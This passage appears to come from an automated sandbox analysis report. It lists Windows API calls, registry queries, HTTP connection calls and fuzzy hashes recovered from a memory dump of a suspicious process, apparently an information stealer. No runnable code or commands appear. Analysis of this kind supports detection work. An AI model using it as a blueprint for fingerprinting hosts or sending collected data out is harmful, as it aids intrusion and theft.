                                                                                                                                                                                                                                                                                                  • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: <
                                                                                                                                                                                                                                                                                                  • API String ID: 1274457161-4251816714
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00410C55
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410C72
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410C94
                                                                                                                                                                                                                                                                                                  • CharToOemA.USER32(00000000,?), ref: 00410CB2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CharOpenQueryValuememset
                                                                                                                                                                                                                                                                                                  • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                                                                  • API String ID: 1728412123-1211650757
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,00427494,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00427480), ref: 0041068E
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,00427494,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00427480,00000000), ref: 00410695
                                                                                                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 004106B5
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004106DB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %d MB$@
                                                                                                                                                                                                                                                                                                  • API String ID: 3644086013-3474575989
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F21
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2311089104-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: caa0b5450c5094a5baae45dd89f1c39122fbd366014749046abec390aabaa39d
                                                                                                                                                                                                                                                                                                  • Instruction ID: c4e30b9aeb20b9eebc150f857a21994ff691bd194d11d8d74cc69b1be826a0c7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: caa0b5450c5094a5baae45dd89f1c39122fbd366014749046abec390aabaa39d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A217C71A0121AAFDB10DFA4EC84FAB7B79EB45754F10023AF912A72C0D7389D11CBA4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(0156F6E8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,00000000,00420210,000000FF,?,0040BCD3,01572100), ref: 004072B1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • SetEnvironmentVariableA.KERNEL32(0156F6E8,00000000,00000000,?,0040BCD3,TjB,00426A54,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00426A4F,?,?,?,00000000,00420210,000000FF), ref: 0040732E
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(01571CA0,?,?,?,00000000,00420210,000000FF,?,0040BCD3), ref: 00407346
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • TjB, xrefs: 004072DA, 00407312, 004072DD
                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004072A6, 004072C4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                                                                                  • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;$TjB
                                                                                                                                                                                                                                                                                                  • API String ID: 2929475105-3266114336
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3c6253b2ee137306e5b69380abe9ad6fab02b1930fa2895b56db71eb43332c6a
                                                                                                                                                                                                                                                                                                  • Instruction ID: ef5f06d785e981839736ef054ac1c91612f0bbff260fa06a83a8b7e256dd51d8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c6253b2ee137306e5b69380abe9ad6fab02b1930fa2895b56db71eb43332c6a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17416E70900615EFC720EFA4ED45EAA7BBAEB48B00F10553EF501A32E1DB786945CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: PdA$PdA
                                                                                                                                                                                                                                                                                                  • API String ID: 4198075804-199869184
                                                                                                                                                                                                                                                                                                  • Opcode ID: 89743936c7e81fd25222ad337d46cbc68b71f87488163e74c6bc97f1d91e7fef
                                                                                                                                                                                                                                                                                                  • Instruction ID: 58f52d09a55b75ac7dcb790bb2502d5d97770f71d094898c51def8a770c609ef
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89743936c7e81fd25222ad337d46cbc68b71f87488163e74c6bc97f1d91e7fef
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB416F34800248EECB11DFE5C941BDDBBB5AF19308F50807EE906632D2DB782B48CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410EF5
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00410EFC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101A0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004101B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101A0: HeapAlloc.KERNEL32(00000000), ref: 004101BC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101A0: RegOpenKeyExA.KERNEL32(80000002,0156B058,00000000,00020119,?), ref: 004101DB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101A0: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004101F5
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,0156B058,00000000,00020119,00000000), ref: 00410F31
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,01571F68,00000000,00000000,00000000,000000FF), ref: 00410F4C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                  • String ID: Windows 11
                                                                                                                                                                                                                                                                                                  • API String ID: 3676486918-2517555085
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004101B5
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 004101BC
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,0156B058,00000000,00020119,?), ref: 004101DB
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004101F5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                  • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                                                                  • API String ID: 3676486918-1022791448
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00416F81
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,01571CC0,00000000,00020119,00422A38), ref: 00416FA0
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(00422A38,015724F0,00000000,00000000,?,000000FF), ref: 00416FC4
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416FF3
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,01572328), ref: 00417007
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$OpenQueryValuememset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 558315959-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,01562700), ref: 004188F5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,01562740), ref: 0041890D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,0156DB58), ref: 00418926
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,0156DC90), ref: 0041893E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,0156DC78), ref: 00418956
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,0156DCA8), ref: 0041896F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,01563F80), ref: 00418987
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,0156DD20), ref: 0041899F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,0156DCF0), ref: 004189B8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,0156DD08), ref: 004189D0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,0156DB70), ref: 004189E8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,01562720), ref: 00418A01
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,015628C0), ref: 00418A19
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,01562760), ref: 00418A31
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,01562C60), ref: 00418A4A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,0156DD80), ref: 00418A62
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417EB0
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417EC7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D30: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410D68
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D30: GetVolumeInformationA.KERNEL32(00421A29,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410DA1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D30: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410DED
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D30: HeapAlloc.KERNEL32(00000000), ref: 00410DF4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404500: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045CA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404500: StrCmpCA.SHLWAPI(?,0156F958,?,?,?,?,?,?,00000000), ref: 004045EA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004127A0: StrCmpCA.SHLWAPI(00000000,block,00000000,?,00417F3E), ref: 004127D8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004127A0: ExitProcess.KERNEL32 ref: 004127E3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405CE0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405DAA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405CE0: StrCmpCA.SHLWAPI(?,0156F958,?,?,?,?,?,?,00000000), ref: 00405DCA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00412220: strtok_s.MSVCRT ref: 00412260
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 004182B7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405CE0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405F54
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004135C0: strtok_s.MSVCRT ref: 004135FE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004135C0: strtok_s.MSVCRT ref: 004136C1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411D10: memset.MSVCRT ref: 00411D4B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405CE0: HttpOpenRequestA.WININET(00000000,0156F8F8,?,015724D8,00000000,00000000,-00400100,00000000), ref: 00405F94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405CE0: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405FBB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$Internetlstrcpy$Open$strtok_s$HeapProcesslstrcatlstrlen$AllocConnectDirectoryExitHttpInformationOptionRequestSleepVolumeWindowsmemset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3722462685-3916222277
                                                                                                                                                                                                                                                                                                  • Opcode ID: 12271ea2f4504a68fc960b10ed437e8ad1c9084cbdc0ba69338d80f575c8c776
                                                                                                                                                                                                                                                                                                  • Instruction ID: af4e92580bc7232f15382c81446c557bbd7ea1f76374bafb1c2556823289d0db
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12271ea2f4504a68fc960b10ed437e8ad1c9084cbdc0ba69338d80f575c8c776
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84329870D00358AACF10EBA5CD46BDDBB75AF19704F5441AEF50873282DB781B48CBA6
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C80C947
                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C80C969
                                                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C80C9A9
                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C80C9C8
                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C80C9E2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
